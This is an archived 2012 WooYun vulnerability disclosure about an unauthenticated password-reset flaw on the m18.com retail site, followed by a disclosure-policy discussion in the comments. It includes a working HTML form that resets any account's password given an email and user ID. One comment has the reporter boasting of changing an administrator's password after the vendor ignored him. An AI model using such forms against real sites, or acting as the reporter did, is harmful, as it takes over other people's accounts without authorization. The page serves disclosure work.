当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-014840

漏洞标题:麦考林网站修改任意账号密码(非爆破),此BUG可起到帐号后门功能

相关厂商:上海麦考林信息科技有限公司

漏洞作者: 齐迹

提交时间:2012-11-16 18:39

修复时间:2012-11-21 18:39

公开时间:2012-11-21 18:39

漏洞类型:设计缺陷/逻辑错误

危害等级:低

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-11-16: 细节已通知厂商并且等待厂商处理中
2012-11-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

非@风萧萧 的爆破。直接绕过权限检测!重置密码

详细说明:

BUG只在邮箱找回密码 重置密码的表单
action地址为:
http://login.m18.com/Service/ContactService.ashx?Method=EmailGetPwdResetPwd
这个表但未对数据进行安全验证 只要输入必要的参数就可以成功

<form action="http://login.m18.com/Service/ContactService.ashx?Method=EmailGetPwdResetPwd" method="post">
  <p>
    <label for="textfield"></label>
    <input type="text" name="EMail" id="textfield" />
  </p>
  <p>
    <label for="textfield2"></label>
    <input type="text" name="ContactID" id="textfield2" />
  </p>
  <p>
    <label for="textfield3"></label>
    <input type="text" name="pwd" id="textfield3" />
  </p>
  <p>
    <input type="submit" name="button" id="button" value="提交" />
  </p>
</form>


只要输入用户邮箱和用户ID 就可以修改用户的密码
至于邮箱和ID怎么来。。。我真不知道!反正细心的朋友可以在他们网站某地方找到。我就不阐述了!

漏洞证明:

1.png


2.png


用的我帐号来试试把。。。随便该
email:xxxxx(at)sina.cn
ID:0098XXXXXX
通过请把这段内容马赛克一下
谢谢@乌云

修复方案:

这个可以懂。。。

版权声明:转载请注明来源 齐迹@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2012-11-21 18:39

厂商回复:

最新状态:

暂无

漏洞评价:

评论

  1. 2012-11-16 18:42 | 马甲哥 ( 实习白帽子 | Rank:91 漏洞数:9 | nice to meet you,i am 马甲哥~)

    @齐迹 占个广告位~

  2. 2012-11-21 20:07 | 小胖胖要减肥 认证白帽子 ( 普通白帽子 | Rank:686 漏洞数:101 )

    @xsser 麦考林和佳品网估计都是没看到漏洞系统自动忽略的,都危害不小啊,以后这肯定是个问题,今天我们公司就被恶意攻击了

  3. 2012-11-21 20:47 | 上海麦考林信息科技有限公司(乌云厂商)

    @齐迹 @马甲哥 @小胖胖要减肥 @xsser 各位白帽子实在抱歉,由于某些原因最近没有及时关注wooyun动态,导致了漏洞被系统忽略。这里向发现漏洞的白帽子表示歉意,感谢各位白帽子对麦考林的关注和支持,我们正在积极修复问题。

  4. 2012-11-21 21:54 | Metas ( 路人 | Rank:9 漏洞数:2 )

    @上海麦考林信息科技有限公司 嘿嘿,祝麦考林越办越好,话说,我以前给我媳妇买的麦考林衣服感觉不怎么样啊。

  5. 2012-11-21 23:00 | 齐迹 ( 核心白帽子 | Rank:784 漏洞数:100 | 一名普通的phper开发者,关注web安全。)

    @上海麦考林信息科技有限公司 竟然忽略!果断修改掉了你们某管理员的帐号密码!

  6. 2012-11-21 23:26 | 小胖胖要减肥 认证白帽子 ( 普通白帽子 | Rank:686 漏洞数:101 )

    @齐迹 是xsser设计网站的逻辑问题,厂商一个星期没反应自动变状态的,这个肯定需要更改 @xsser

  7. 2012-11-21 23:54 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @小胖胖要减肥 你告诉我怎么改

  8. 2012-11-21 23:56 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    邮件发了 rss订阅开了 有的私信也发了 还应该怎么改 五天不理你说十天 十天不理就一个月?

  9. 2012-11-22 00:21 | softbug ( 实习白帽子 | Rank:66 漏洞数:10 | 为人类设计最好的软件,解放人的双手,一起...)

    @xsser 一直想知道xsser对外的联系方式,是电话直接告知对方吗

  10. 2012-11-22 01:31 | Metas ( 路人 | Rank:9 漏洞数:2 )

    @xsser hold住啊

  11. 2012-11-22 08:48 | 小胖胖要减肥 认证白帽子 ( 普通白帽子 | Rank:686 漏洞数:101 )

    @xsser 你不是之前说要求邮件组注册了吗,还要求有手机号么,不过5天可以稍微加点比如最长10天,主要如果公开对wooyun没有影响也无所谓,损失的是漏洞网站自己

  12. 2012-11-22 08:49 | 一刀终情 ( 普通白帽子 | Rank:156 漏洞数:28 | ‮‮PKAV技术宅社区-安全爱好者)

    @xsser 找个赞助商,弄个短信平台吧~

  13. 2012-11-22 08:55 | 小胖胖要减肥 认证白帽子 ( 普通白帽子 | Rank:686 漏洞数:101 )

    @一刀终情 短信接口他自己肯定搞的 这种有第三方的

  14. 2012-11-22 09:53 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @小胖胖要减肥 5天是验证和确认问题 完全足够 10天还是有人觉得短的

  15. 2012-11-22 10:07 | 小胖胖要减肥 认证白帽子 ( 普通白帽子 | Rank:686 漏洞数:101 )

    @xsser 你要考虑到长假啊 所以我说最长10天嘛 还有现在已注册厂商都可以要求通知邮件改为邮件组加手机号的,不过是多加个字段罢了

  16. 2012-11-22 10:18 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @小胖胖要减肥 嗯 你也是乌云党啊 随时刷

  17. 2012-11-22 11:04 | 小胖胖要减肥 认证白帽子 ( 普通白帽子 | Rank:686 漏洞数:101 )

    @xsser 打酱油的工作啊

  18. 2012-11-22 11:15 | 齐迹 ( 核心白帽子 | Rank:784 漏洞数:100 | 一名普通的phper开发者,关注web安全。)

    文件被删除了真实情况比反映的还要邪恶。。只需要输入ID 即可修改密码。。or 1=1我都不敢试。。。怕犯罪!